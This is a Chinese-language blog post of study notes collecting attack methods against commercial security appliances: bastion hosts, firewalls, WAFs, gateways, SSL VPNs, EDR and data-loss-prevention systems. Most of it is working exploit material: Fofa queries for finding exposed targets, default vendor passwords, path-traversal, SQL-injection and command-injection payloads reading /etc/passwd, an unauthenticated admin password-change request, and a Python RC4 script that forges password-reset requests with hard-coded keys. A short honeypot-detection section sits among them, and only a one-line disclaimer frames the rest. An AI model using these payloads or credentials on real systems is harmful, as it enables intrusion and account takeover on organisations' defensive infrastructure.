学习笔记-常见安全设备渗透方法

SecDevice - Exploits


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


大纲


身份与访问控制

堡垒机

齐治堡垒机

Fofa: app="齐治科技-堡垒机"

H3C SecParh

Fofa: app="H3C-SecPath-运维审计系统" && body="2018"

  • get_detail_view.php 任意用户登录漏洞
    • POC | Payload | exp
      /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
      

teleport 开源堡垒机

fofa: app="TELEPORT堡垒机"

IMC

H3C IMC智能管理中心


网络检测与响应

蜜罐

相关文章

相关工具

从蓝队溯源角度出发

  • 分析样本
    • PC 名称
    • 语言
    • 常用函数、方法
    • 注释习惯、变量名习惯
  • 前端漏洞反制
    • 浏览器记录、书签、cookie 等
    • 验证码、手机号、邮箱
    • 攻击时间段
  • 后渗透反制
    • 钓鱼文件
    • ntlm中继
    • Rogue MySql Server

从红队角度出发

  • 前台
    • 不支持正常浏览器,仅老版 IE
    • 仅支持老版本 flash
    • 不正常的 JS 文件,js 混淆
    • 仅 json 文件, 内含指纹
    • XSS、JSONP
    • 大量网络请求
    • 同站同 CMS 不同页面不同时间、CMS 版本
    • 任意口令登录?
    • 要求实名认证、或手机号注册
  • 后渗透
    • 第二次登录后发现 history 记录全部清空
    • 开放了大量端口
    • docker 容器且无正常业务数据
    • 例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的,而这真实的系统中是不可能的。

IDS

相关文章

绿盟 UTS 综合威胁探针


防火墙

Cisco ASA

  • CVE-2018-0296 Cisco ASA Directory Traversal

  • CVE-2020-3452

    • POC | Payload | exp
      /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
      

网康下一代防火墙

fofa: app="网康科技-下一代防火墙"

  • 网康下一代防火墙 RCE
    • POC | Payload | exp
      POST /directdata/direct/router HTTP/1.1
      
      {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
      
      访问:https://x.x.x.x/test_test.txt
      

启明星辰 天清汉马USG防火墙

  • 弱口令

    账号:useradmin
    密码:venus.user
    
  • 逻辑缺陷漏洞

    登陆后,后台可直接修改任意用户权限
    

佑友防火墙

  • 默认账号密码

    User: admin
    Pass: hicomadmin
    
  • 后台命令执行漏洞

    系统管理 --> 维护工具 --> Ping
    127.0.0.1|cat /etc/passwd
    

zeroshell


WAF

Sophos XG

绿盟 waf 封禁绕过s

  • XFF 伪造字段地址为 127.0.0.1,导致 waf 上看不见攻击者地址

网关

上海格尔安全认证网关管理系统

网康 NS-ASG 安全网关

Fofa : 网康 NS-ASG 安全网关

  • 任意文件读取漏洞
    • POC | Payload | exp
      /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
      

负载均衡

Citrix ADC

F5 BIG-IP

天融信 Top-app LB


VPN

Fortigate SSL VPN

Palo_Alto SSL VPN

Pulse_Secure SSL VPN

深信服 VPN

  • 常见密码

    admin/sangfor@123
    sangfor/sangfor
    test/test
    test1/123456b
    
  • 口令爆破

    • POC | Payload | exp
      • https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
        用户登录,若多次尝试登录失败会要求输入验证码,若输入错误的验证码,会提示“校验码错误或校验码已过期”;修改登录请求的数据包,清空cookie和验证码字段的值即可绕过验证码,此时提示“用户名或密码错误”。
        /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
        
  • 短信绕过

    • POC | Payload | exp
      POST https://路径/por/changetelnum.csp?apiversion=1
      
      newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
      
  • 任意密码重置

    • POC | Payload | exp
      某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码
      利用:需要登录账号
      
      M7.6.6R1版本key为20181118
      
      M7.6.1key为20100720
      
      POST /por/changepwd.csp
      
      sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
      
      from Crypto.Cipher import ARC4
      from binascii import a2b_hex
      
      def myRC4(data, key):
          rc41= ARC4.new(key)
          encrypted =rc41.encrypt(data)
          return encrypted. encode('hex')
      
      def rc4_decrpt_hex(data, key):
          rc41= ARC4. new(key)
          return rc41. decrypt(a2b_hex(data))
      
      key= '20100720'
      data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
      print myRC4(data, key)
      
  • RCE

    • 影响版本

      • SSLM7.6.6(20181120)
      • SSLM7.6.6R1(20181225)
    • 相关文章

    • POC | Payload | exp

      https://x.com/por/checkurl.csp?url=http://127.0.0.1;sleep${IFS}5;&retry=0&timeout=1
      

锐捷 SSL VPN

  • 锐捷 SSL VPN 越权访问漏洞
    • FOFA: icon_hash="884334722" || title="Ruijie SSL VPN"
    • 相关文章
    • POC | Payload | exp
      GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
      Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
      
      UserName 参数为已知用户名

威胁感知

Sophos UTM


终端响应与检测

相关文章

杀软

利用杀毒软件删除任意文件

白名单信任文件

EDR

深信服 EDR

360天擎

Fofa: title="360天擎"

  • 前台SQL注入

    • POC | Payload | exp
      /api/dp/rptsvcsyncpoint?ccid=1
      
  • 数据库信息泄露漏洞

    • POC | Payload | exp
      http://x.x.x.x/api/dbstat/gettablessize
      

金山 V8 终端安全系统

Fofa: title="在线安装-V8+终端安全系统Web控制台"

  • 任意文件读取漏洞

    • POC | Payload | exp
      /htmltopdf/downfile.php?filename=downfile.php
      
  • pdf_maker.php 命令执行漏洞

    • 相关文章

    • POC | Payload | exp

      POST /inter/pdf_maker.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      
      url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
      

数据防泄漏系统

天融信数据防泄漏系统

  • 越权修改管理员密码
    无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
    
    POST /?module=auth_user&action=mod_edit_pwd
    
    Cookie: username=superman;
    uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
    

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

posted @ 2022-10-30 16:03  syscallwww  阅读(1074)  评论(0编辑  收藏  举报